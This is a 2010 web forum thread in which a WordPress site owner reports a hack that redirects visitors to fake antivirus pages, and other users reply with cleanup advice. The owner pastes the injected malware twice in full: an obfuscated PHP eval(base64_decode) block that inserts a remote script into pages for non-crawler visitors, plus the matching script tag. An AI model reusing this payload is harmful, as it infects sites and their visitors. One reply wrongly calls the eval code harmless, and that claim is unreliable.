Wordpress Site Hacked - Please HELP !!!

Both wp-adin/dashboard and my site is getting redirected to:

1. http://www.bing.com/search?q=freevirusscan&go=&form=QBRE&filt=all
2. http://scaner24.org/?affid=318&subid=landing

Today, 04/14/2010 i logged into dashboard and it was crashed.
I tried to refresh many a times and it still was crashed,
and i saw this address running fast in the Task Bar:

http://kdjkfjskdfjlskdjf.com

After sometime the dashboard started redirecting to bing.com mentioned above.

Changes i did today:

1. Uninstalled wp-united.
2. Uninstalled Phpbb.
3. Installed Beeline wp plugin.
4. INSTALLED wp plugin Tal.Ki (Tal.ki Embeddable Forums)

I came to know my site has been HACKED and googled few solutions.

1. Changed Wp Admin Password.
2. Changed FTP Password.
3. Saw this code in Page Source:

<script type='text/javascript'>
/* <![CDATA[ */
var thickboxL10n = {
	next: "Next &gt;",
	prev: "&lt; Prev",
	image: "Image",
	of: "of",
	close: "Close"
};
try{convertEntities(thickboxL10n);}catch(e){};
var commonL10n = {
	warnDelete: "You are about to permanently delete the selected items.\n  \'Cancel\' to stop, \'OK\' to delete."
};
try{convertEntities(commonL10n);}catch(e){};
var wpAjax = {
	noPerm: "You do not have permission to do that.",
	broken: "An unidentified error has occurred."
};
try{convertEntities(wpAjax);}catch(e){};
var adminCommentsL10n = {
	hotkeys_highlight_first: "",
	hotkeys_highlight_last: ""
};
var plugininstallL10n = {
	plugin_information: "Plugin Information:"
};
try{convertEntities(plugininstallL10n);}catch(e){};
/* ]]> */
</script>
<script type='text/javascript' src='http://indiangirlsclub.com/wp-admin/load-scripts.php?c=1&amp;load=thickbox,hoverIntent,common,jquery-color,jquery-ui-core,jquery-ui-sortable,wp-ajax-response,wp-lists,jquery-ui-resizable,admin-comments,postbox,dashboard,plugin-install,media-upload&amp;ver=b92e060c1632e7b2fe6ec9809056c0d0'></script>

<script type="text/javascript">if(typeof wpOnload=='function')wpOnload();</script>
<script src="http://kdjkfjskdfjlskdjf.com/js.php"></script>

Code (markup):

5. Removed this code from Index.php and Load-Scripts.php :

<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sImdvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgICByZXR1cm4gYmFzZTY0X2RlY29kZSgiUEhOamNtbHdkQ0J6Y21NOUltaDBkSEE2THk5clpHcHJabXB6YTJSbWFteHphMlJxWmk1amIyMHZhbk11Y0dod0lqNDhMM05qY21sd2REND0iKTsgICAgICB9ICAgICAgcmV0dXJuICIiOyAgICAgfSAgICB9ICAgICAgICBpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXsgICAgIGZ1bmN0aW9uIGd6ZGVjb2RlKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMpeyAgICAgICRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQ9QG9yZChAc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsMywxKSk7ICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT0xMDsgICAgICAkUkEzRDUyRTUyQTQ4OTM2Q0RFMEY1MzU2QkIwODY1MkYyPTA7ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCY0KXsgICAgICAgJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQj1AdW5wYWNrKCd2JyxzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywxMCwyKSk7ICAgICAgICRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI9JFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQlsxXTsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSs9MiskUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjgpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PUBzdHJwb3MoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QyxjaHIoMCksJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkrMTsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCYxNil7ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9QHN0cnBvcygkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLGNocigwKSwkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSsxOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjIpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5Kz0yOyAgICAgIH0gICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPUBnemluZmxhdGUoQHN1YnN0cigkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKTsgICAgICBpZigkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPT09RkFMU0UpeyAgICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPSRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEM7ICAgICAgfSAgICAgIHJldHVybiAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzOyAgICAgfSAgICB9ICAgIGZ1bmN0aW9uIG1yb2JoKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpeyAgICAgSGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBub25lJyk7ICAgICAkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFPWd6ZGVjb2RlKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpOyAgICAgICBpZihwcmVnX21hdGNoKCcvXDxcL2JvZHkvc2knLCRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUpKXsgICAgICByZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8XC9ib2R5W15cPl0qXD4pL3NpJyxnbWwoKS4iXG4iLickMScsJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERSk7ICAgICB9ZWxzZXsgICAgICByZXR1cm4gJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERS5nbWwoKTsgICAgIH0gICAgfSAgICBvYl9zdGFydCgnbXJvYmgnKTsgICB9ICB9"));?>

Code (markup):

6. Uninstalled Tal.Ki Plugin.



Still my site is not clean.

It's getting redirected to :

1. http://www.bing.com/search?q=freevirusscan&go=&form=QBRE&filt=all
2. http://scaner24.org/?affid=318&subid=landing

Site Url: http://indiangirlsclub.com
Please HELP me. I'm not a tech savvy. What else should i do ???

 

which hosting service you use?? contact them and tell them your problem. If hostgator you can easily contact them by live chat, i don't know about hosting provider though.
hope it helps

 

Thank you noobbgodlike.

I'm using Godaddy. I will contact them immediately.

I found that the eval base code 64 is present all over the php files. Manually i have started to delete the codes now.

Is there anything else i have to follow, so that this never happens in future?

Thanks for the help.

 

you are welcome just careful enter your password (phising or etc) if you register in new site use fake password for a while after you know it is real or good change the password. I don;t know about any method beside that because i am just newbie too LOL.

 

Unable to delete the "eval base 64" code as it is present throughout the FTP folders in php files.

It's impossible to edit each and every php file.

I have contacted Godaddy and waiting for their reply.

Any fix to delete the codes ???

 

1- take wp-content folder on your local machine

2- remove all files

3- install fresh new copy of wordpress latest version

4- use same database setting of your old site

5- try to clean your theme manually if its custom one

6- get new versions of your current active plugins and add them in plugin folder

7- change wp admin password

 

@ oneahmed,

My problem is getting more complex.

It's just not only the Wordpress ... I also have topsites directory, 4images, Another Wordpress with Buddypress installed in the root.

I have removed the codes from admin, content and includes manually.

Unable to Login to Dashboard as it immediately redirects to some other website.

I'm still wondering how my site was hacked !!!!!!!!!

I hope Godaddy can fix it.

Thanks oneahmed.

 

I am also in the same boat. Did anyone find a solution ?

 

@ dpmaster72 ...

I deleted all the wp files, wp plugins and replaced it.
I'm running the latest version of wordpress but still my site was hacked.

Afraid again my blog would be hacked, coz i'm not familiar with Database and the Backdoors.
But have changed the passwords for user, database and FTP.

Googling revealed that most of the blogs hacked were in Godaddy Shared Hosting Server.

Here is the reply we got from Godaddy support:

I'm helpless !!!!!!!!!!!!!!!!!!!!

Deleted 4images, Topsites and Worpress with Buddypress. (I have spent so many hours and hardwork to create, customize and promote).

 

Hi,

It looks like hacker has tempered your wordpress database as well. If possible send me database through pm i will check it out. Or just give me access to your cpanel i will see what i can do for you.

Regards,
Arshad

 

I have installed Wordpress Firewall Plugin.

My email is dumped in few minutes with 129 Alert Messages from IP: 202.69.200.5 Sri Lanka, Western, Wattala

and 2 Alert Messages from New Delhi, India and 2 Alert Messages from MY IP Address.

I checked the ".jpg" file and it's ok just an image.
The offending parameter is from Google Images !!!!

Is this ok, can i neglect this Alert ???

 

Now, i'm unable to view my blog.

Got this message:

After refreshing the browser so many times, Got this message:

And again more 239 Alert Emails From Wordpress Firewall, But this time it's stating my Ip address in all the emails.

 

I had 16 hacked WP sites to contend with last year. Still unclear how it happened but since then the host has tightened security ... humm.

Anyhow most my files infected were index.htm or index.html or those two files were created in each folder!

There were many other php files infected. You may want to check your database they could have done and injection of sorts. One thing that was common was was 2 URLS in the code and appeared to running a counter/clicker script of sorts. So if this sounds like a similar situation I may be able to help.

 

Do you have a fresh copy of your Wordpress in your computer?
If yes, try to reinstall all...
The eva code is not a virus, there are many reasons why it is here, myself, my wordpress have this eva code and it just a code to run wordpress normally.
Try to find the "virus code" in your wordpress files, if you have a copy of it in your computer, view them both to see if any code have change if you see a odd code, remove it, change your files permissions (chmod) to 755.
I remember when my wordpress got hacke, i had always a pop up who come in my website, it was because i modify the chmode to 777.
So i install a wordpress plugin: Exploit Scan to see what files was installed and i see that there was some odd code in my themes files, so i remove all the themes and change for a new and then, all work perfectly.

 

I can Help You Bro..!

Give me Access to your Cpanel.. and i can make it alright...!

Or Even You can Do It..!
Save all the databases needed..! and Reinstall the scripts with fresh copies..! DOne..!

PM me if you want me to do it..!

 

This has happened to me 4 times; 4 times!!!

On each occasion I deleted all my wordpress files and reinstalled wordpress and reinstalled all my plugins.

I have no idea why it recurs, but it's not a coincidence that I use two hosting packages for two sites and it only happens with the godaddy hosting

 

Highly likely you have a vulnerabilty in one of your scripts. I doubt sincerely its the wordpress script itself, more likely a wordpress plugin or another of your website scripts is allowing a hacker in - and then through to all your websites because of your server settings (i.e. user 'apache' can write to all website files) so look at the other sites you have on your server too.

Two things:
1. Check your .htacess files for redirect codes. This may be the cause of your redirects.
2. You will have to replace your website files with either backups or upgrades. If you do not have backups or cannot find original files then yes, you do have to manually go through each file and clean it but....

there is no point cleaning all the files or replacing files if you do not close of the security flaw you have. All the hacker needs do is wash, rinse and repeat his actions and then you must clean,wash, rinse and repeat yours.

You MUST find the hole!

If you are using Hostgator its unlikely that it was their fault, more likely it was vulnerability in your scripts. What I mean is that it is unlikely that hostgator itself was hack simply to get to your account. More likely that either your server setup is flawed (if you set up the server yourself) and if you are on a shared server than its odds on money its one of the website scripts/ website extensions/plugins that are at fault.

First step is your logs. If you have access to your sever security log, look for successful logins other than yours.
Check your website logs looking for strange url requests that look out of place. Sometimes these strange url requrests can even be spotted just by browsing through your url requests in statcounter.

Enter the name of your website scripts into Google with the tag 'security warning' or 'vulnerabilty' to see what comes up. Ensure you close off any flaws that you find. Do this for your wordpress plugins also.
2. If you are have set up an email server, shut it down for the moment. Its another great way to get into a server if not set up properly.

Good luck!

 

I use godaddy hosting and my forum was also hacked.

It isn't just WP that is being hacked.

 

My blog is hacked again.
I have cleared everything and changed the passwords, installed security plugins. But now my site is hacked again.

It's again has the same script in the Page Source:

<script src="http://kdjkfjskdfjlskdjf.com/kp.php"></script>

Code (markup):

And my antivirus program has blocked my site and giving an Alert.
Site is getting redirected to the below link.

http:// www1.protectsys28-pd.xorg.pl/?p=p52dcWpkbG6HjsbIo216h3de0KCfYWCcU9LXoKitioaLw8ydb5aYen5arK3NasiXk2Rea2JrmV2ZVqPajtfZ1m5do3OL1cytnpl2Wp6dpJ6eU9rPlqdqWpuooV6UYl6XY5eSlWVsYGiYk4mrl5p2nKyoqHOQXM3UlZmOopmh1pnVk5zbj5HH0p5mWKrYnpRraWZwaGhlaHCHodeYbmFfa2RvmF2TYGeMkMahrH9dqZ%2FJnptyag%3D%3D

Code (markup):

All the php files have this code on the first line:

<?php /**/eval(base64_decode (" aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sImdvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgICByZXR1cm4gYmFzZTY0X2RlY29kZSgiUEhOamNtbHdkQ0J6Y21NOUltaDBkSEE2THk5clpHcHJabXB6YTJSbWFteHphMlJxWmk1amIyMHZhM0F1Y0dod0lqNDhMM05qY21sd2REND0iKTsgICAgICB9ICAgICAgcmV0dXJuICIiOyAgICAgfSAgICB9ICAgICAgICBpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXsgICAgIGZ1bmN0aW9uIGd6ZGVjb2RlKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMpeyAgICAgICRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQ9QG9yZChAc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsMywxKSk7ICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT0xMDsgICAgICAkUkEzRDUyRTUyQTQ4OTM2Q0RFMEY1MzU2QkIwODY1MkYyPTA7ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCY0KXsgICAgICAgJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQj1AdW5wYWNrKCd2JyxzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywxMCwyKSk7ICAgICAgICRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI9JFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQlsxXTsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSs9MiskUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjgpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PUBzdHJwb3MoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QyxjaHIoMCksJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkrMTsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCYxNil7ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9QHN0cnBvcygkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLGNocigwKSwkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSsxOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjIpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5Kz0yOyAgICAgIH0gICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPUBnemluZmxhdGUoQHN1YnN0cigkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKTsgICAgICBpZigkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPT09RkFMU0UpeyAgICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPSRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEM7ICAgICAgfSAgICAgIHJldHVybiAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzOyAgICAgfSAgICB9ICAgIGZ1bmN0aW9uIG1yb2JoKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpeyAgICAgSGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBub25lJyk7ICAgICAkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFPWd6ZGVjb2RlKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpOyAgICAgICBpZihwcmVnX21hdGNoKCcvXDxcL2JvZHkvc2knLCRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUpKXsgICAgICByZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8XC9ib2R5W15cPl0qXD4pL3NpJyxnbWwoKS4iXG4iLickMScsJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERSk7ICAgICB9ZWxzZXsgICAgICByZXR1cm4gJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERS5nbWwoKTsgICAgIH0gICAgfSAgICBvYl9zdGFydCgnbXJvYmgnKTsgICB9ICB9"));?>

Code (markup):

I feel to Quit blogging.

 

Is the computer you use to access your site clean ? Some people can have malware on their own computer that does damage to other sites.